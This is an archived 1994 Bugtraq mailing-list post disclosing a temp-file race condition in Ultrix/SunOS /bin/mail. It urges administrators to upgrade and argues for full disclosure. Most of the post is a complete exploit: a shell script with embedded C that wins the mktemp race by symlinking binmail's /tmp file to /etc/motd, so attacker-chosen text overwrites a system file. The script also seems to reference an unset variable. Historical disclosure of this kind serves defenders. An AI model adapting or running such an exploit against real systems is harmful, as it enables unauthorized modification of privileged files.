Bugtraq mailing list archives
/bin/mail Security Hole
From: nlawson () galaxy csc calpoly edu (Nathan Lawson)
Date: Sat, 26 Nov 1994 00:42:09 -0800 (PST)
Hello all, I heard a lot of talk a while back about another two holes in binmail(1). No one seemed to know or be willing to tell exactly what it was. I spent some time doing "strings" on /bin/mail and guessed that it had several problems. It used mktemp.c to make the temporary mailbox in /tmp and the lock file in /usr/spool/mail (both unsafe paths). Since it also seemed to use fopen.c for the actual file creation, I realized that a race definitely existed. A few days ago, I heard rumors of an unreleased 8lgm script that exploited these two holes. After a little mucking around, I worked out the following script. I have been told that it works on Ultrix 4.2, as well as SunOS 4.1.X. It exploits the tempfile race, but can easily be modified to race with the lock file. I definitely recommend that all you administrators who haven't upgraded to "mail.local.c" or procmail do so. Above all, FIX THIS HOLE. As to 8lgm, I definitely supported you in the past, but turning to security through obscurity this late in the game is a turn for the worse. If you have written an exploit, make it public, or do NOT give it to anyone, not even your best friend's dog. There's a lesson to be learned that has been repeated throughout history: give out copies to only a few people, and the entire cracker community will get it. Let's see a little more "all or nothing" commitments from the security community. -Nate (nlawson () galaxy calpoly edu) ------------------------ cut here ---------------------------- #!/bin/sh # # This exploits a flaw in Ultrix/SunOS binmail(1), and attempts # to embarrass the admin, by creating an motd entry. # # Written 1994 by Nate Lawson <nlawson () galaxy calpoly edu> # Minor Revisions by Chris Ellwood <cellwood () gauss calpoly edu> # Thanks go to 8lgm for the basic script format. PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" ME="`whoami`" PWENT="I would fix this big hole guys!!!" cat > race.c << 'EOF' #define TARGET "/etc/motd" #include <stdio.h> #include <unistd.h> #include <stdlib.h> int main( ac,av) int ac; char **av; { unsigned int pid,bpid; /* Some machines don't have pid_t */ int i; char target[13]; strcpy (target,"/tmp/maa"); /* General format for binmail temp names */ if ((pid = fork())==0) { sleep (2); nice (19); /* Increase our chances and ... */ execl ("/bin/mail","mail",0); /* Fork binmail */ } bpid=pid; /* back up our pid for a later time */ for (i=11;i>=8;i--) { target[i]=(pid%10) + '0'; /* Make the name for the tempfile */ pid /= 10; } while (!symlink(TARGET,target)) unlink (target); /* Point that mktemp()'d file to the pot of gold */ while (symlink(TARGET,target)) unlink (target); /* Probably not necessary, but what the heck */ kill(bpid,1); /* Clean up, don't want to lag the system */ } EOF cc -O -s -o race race.c # Check we now have race if [ ! -x "race" ]; then echo "$PROG: couldnt compile race.c - lame!" exit 1 fi OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null NEW_TARGET_LEN=$OLD_TARGET_LEN cp /usr/spool/mail/$ME /tmp/$$ # Backup the mail spool.. we need it cp /dev/null /usr/spool/mail/$ME echo "" >> /usr/spool/mail/$ME echo $PWENT >> /usr/spool/mail/$ME echo "" >> /usr/spool/mail/$ME while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do ./race & RACE_PID=$! sleep 4 NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null kill -9 $RACE_PID done # We won the race echo "Succeeded.." # Add back our spool.. don't want to lose our mail. cp /dev/null /usr/spool/$ME cp /tmp/$$ /usr/spool/mail/$ME rm -f /tmp/$$ race race.c exit 0
Current thread:
- /bin/mail Security Hole Nathan Lawson (Nov 26)
- Re: /bin/mail Security Hole Casper Dik (Nov 26)
- Re: /bin/mail Security Hole Neil Woods (Nov 26)
- [8lgm]-Advisory-8.UNIX.SunOS-kernel.11-Nov-1994 [8LGM] Security Team (Nov 27)
- [8lgm]-Advisory-9.UNIX.urestore.10-Feb-1993 [8LGM] Security Team (Nov 27)
- [8lgm]-Advisory-13.UNIX.SCO-login.15-Apr-1994 [8LGM] Security Team (Nov 27)